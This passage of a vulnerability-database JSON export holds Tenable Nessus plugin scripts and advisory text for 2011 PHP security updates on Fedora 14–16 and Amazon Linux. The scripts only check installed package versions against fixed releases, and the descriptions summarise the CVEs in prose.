socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1 Upstream announce\nfor 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-18-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-23-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=709067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=713194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=715025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=732516\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066102.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4634af29\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066103.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1d7ceb4d\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066104.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c8d9735d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"maniadrive-1.2-32.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"php-5.3.8-1.fc14\")) flag++;\nif (rpm_check(release:\"FC14\", reference:\"php-eaccelerator-0.9.6.1-9.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:07", "description": "Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1\n\nUpstream announce for 5.3.7:\nhttp://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nphp package now provides both apache modules (for prefork and worker\nMPM).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-09-12T00:00:00", "title": "Fedora 16 : maniadrive-1.2-32.fc16 / php-5.3.8-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16 (2011-11464)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-2202"], "modified": "2011-09-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:16", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-11464.NASL", "href": "https://www.tenable.com/plugins/nessus/56150", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-11464.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56150);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\");\n script_bugtraq_id(46843, 47950, 48259, 49241, 49249);\n script_xref(name:\"FEDORA\", value:\"2011-11464\");\n\n script_name(english:\"Fedora 16 : maniadrive-1.2-32.fc16 / php-5.3.8-1.fc16 / php-eaccelerator-0.9.6.1-9.fc16 (2011-11464)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1\n\nUpstream announce for 5.3.7:\nhttp://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nphp package now provides both apache modules (for prefork and worker\nMPM).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-18-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-23-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=709067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=713194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=715025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=732516\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/065673.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1686eb9b\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/065674.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?a64ae93c\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/065675.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d04815a3\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"maniadrive-1.2-32.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-5.3.8-1.fc16\")) flag++;\nif (rpm_check(release:\"FC16\", reference:\"php-eaccelerator-0.9.6.1-9.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:09:07", "description": "Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1 Upstream announce\nfor 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-09-19T00:00:00", "title": "Fedora 15 : maniadrive-1.2-32.fc15 / php-5.3.8-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15 (2011-11528)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-2202"], "modified": "2011-09-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php-eaccelerator", "p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:15", "p-cpe:/a:fedoraproject:fedora:maniadrive"], "id": "FEDORA_2011-11528.NASL", "href": "https://www.tenable.com/plugins/nessus/56218", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-11528.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56218);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\");\n script_bugtraq_id(46843, 47950, 48259, 49241, 49249);\n script_xref(name:\"FEDORA\", value:\"2011-11528\");\n\n script_name(english:\"Fedora 15 : maniadrive-1.2-32.fc15 / php-5.3.8-1.fc15 / php-eaccelerator-0.9.6.1-9.fc15 (2011-11528)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Enhancements and Fixes :\n\n - Updated crypt_blowfish to 1.2. (CVE-2011-2483)\n\n - Fixed crash in error_log(). Reported by Mateusz\n Kocielski\n\n - Fixed buffer overflow on overlog salt in crypt().\n\n - Fixed bug #54939 (File path injection vulnerability in\n RFC1867 File upload filename). Reported by Krzysztof\n Kotowicz. (CVE-2011-2202)\n\n - Fixed stack-based buffer overflow in socket_connect().\n (CVE-2011-1938)\n\n - Fixed bug #54238 (use-after-free in substr_replace()).\n (CVE-2011-1148)\n\nUpstream announce for 5.3.8:\nhttp://www.php.net/archive/2011.php#id2011-08-23-1 Upstream announce\nfor 5.3.7: http://www.php.net/archive/2011.php#id2011-08-18-1\n\nFull Changelog: http://www.php.net/ChangeLog-5.php#5.3.8\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/ChangeLog-5.php#5.3.8\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-18-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.php.net/archive/2011.php#id2011-08-23-1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=688958\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=709067\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=713194\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=715025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=732516\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066105.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?665afecc\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066106.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?06722286\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066107.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b071447c\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected maniadrive, php and / or php-eaccelerator\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:maniadrive\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"maniadrive-1.2-32.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-5.3.8-1.fc15\")) flag++;\nif (rpm_check(release:\"FC15\", reference:\"php-eaccelerator-0.9.6.1-9.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"maniadrive / php / php-eaccelerator\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:18:00", "description": "PHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function.\n\nThe is_a function in PHP 5.3.7 and 5.3.8 triggers a call to the\n__autoload function, which makes it easier for remote attackers to\nexecute arbitrary code by providing a crafted URL and leveraging\npotentially unsafe behavior in certain PEAR packages and custom\nautoloaders.\n\nphp: changes to is_a() in 5.3.7 may allow arbitrary code execution\nwith certain code\n\nA signedness issue was found in the way the PHP crypt() function\nhandled 8-bit characters in passwords when using Blowfish hashing. Up\nto three characters immediately preceding a non-ASCII character (one\nwith the high bit set) had no effect on the hash result, thus\nshortening the effective password length. This made brute-force\nguessing more efficient as several different passwords were hashed to\nthe same value.\n\nA signedness issue was found in the way the crypt() function in the\nPostgreSQL pgcrypto module handled 8-bit characters in passwords when\nusing Blowfish hashing. Up to three characters immediately preceding a\nnon-ASCII character (one with the high bit set) had no effect on the\nhash result, thus shortening the effective password length. This made\nbrute-force guessing more efficient as several different passwords\nwere hashed to the same value.\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, PostgreSQL before 8.4.9, and other products, does not\nproperly handle 8-bit characters, which makes it easier for\ncontext-dependent attackers to determine a cleartext password by\nleveraging knowledge of a password hash.\n\nA stack-based buffer overflow flaw was found in the way the PHP socket\nextension handled long AF_UNIX socket addresses. An attacker able to\nmake a PHP script connect to a long AF_UNIX socket address could use\nthis flaw to crash the PHP interpreter.\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nAn off-by-one flaw was found in PHP. If an attacker uploaded a file\nwith a specially crafted file name it could cause a PHP script to\nattempt to write a file to the root (/) directory. By default, PHP\nruns as the 'apache' user, preventing it from writing to the root\ndirectory.\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a 'file path injection\nvulnerability.'\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments.\n\nA use-after-free flaw was found in the PHP substr_replace() function.\nIf a PHP script used the same variable as multiple function arguments,\na remote attacker could possibly use this to crash the PHP interpreter\nor, possibly, execute arbitrary code.", "edition": 24, "published": "2014-10-12T00:00:00", "title": "Amazon Linux AMI : php (ALAS-2011-7)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-1148", "CVE-2011-1938", "CVE-2011-2483", "CVE-2011-3182", "CVE-2011-3379", "CVE-2011-2202"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php-debuginfo", "p-cpe:/a:amazon:linux:php-xml", "p-cpe:/a:amazon:linux:php-odbc", "p-cpe:/a:amazon:linux:php-mcrypt", "p-cpe:/a:amazon:linux:php-snmp", "p-cpe:/a:amazon:linux:php-mbstring", "p-cpe:/a:amazon:linux:php-cli", "p-cpe:/a:amazon:linux:php-zts", "p-cpe:/a:amazon:linux:php-embedded", "p-cpe:/a:amazon:linux:php-common", "p-cpe:/a:amazon:linux:php-ldap", "p-cpe:/a:amazon:linux:php-devel", "p-cpe:/a:amazon:linux:php-gd", "p-cpe:/a:amazon:linux:php-bcmath", "p-cpe:/a:amazon:linux:php-xmlrpc", "p-cpe:/a:amazon:linux:php-intl", "p-cpe:/a:amazon:linux:php", "p-cpe:/a:amazon:linux:php-process", "p-cpe:/a:amazon:linux:php-fpm", "p-cpe:/a:amazon:linux:php-pspell", "p-cpe:/a:amazon:linux:php-dba", "p-cpe:/a:amazon:linux:php-pdo", "p-cpe:/a:amazon:linux:php-pgsql", "p-cpe:/a:amazon:linux:php-imap", "p-cpe:/a:amazon:linux:php-mysql", "p-cpe:/a:amazon:linux:php-soap", "p-cpe:/a:amazon:linux:php-tidy", "p-cpe:/a:amazon:linux:php-mssql", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2011-7.NASL", "href": "https://www.tenable.com/plugins/nessus/78268", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-7.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78268);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/07/10 16:04:12\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3379\");\n script_xref(name:\"ALAS\", value:\"2011-7\");\n\n script_name(english:\"Amazon Linux AMI : php (ALAS-2011-7)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function.\n\nThe is_a function in PHP 5.3.7 and 5.3.8 triggers a call to the\n__autoload function, which makes it easier for remote attackers to\nexecute arbitrary code by providing a crafted URL and leveraging\npotentially unsafe behavior in certain PEAR packages and custom\nautoloaders.\n\nphp: changes to is_a() in 5.3.7 may allow arbitrary code execution\nwith certain code\n\nA signedness issue was found in the way the PHP crypt() function\nhandled 8-bit characters in passwords when using Blowfish hashing. Up\nto three characters immediately preceding a non-ASCII character (one\nwith the high bit set) had no effect on the hash result, thus\nshortening the effective password length. This made brute-force\nguessing more efficient as several different passwords were hashed to\nthe same value.\n\nA signedness issue was found in the way the crypt() function in the\nPostgreSQL pgcrypto module handled 8-bit characters in passwords when\nusing Blowfish hashing. Up to three characters immediately preceding 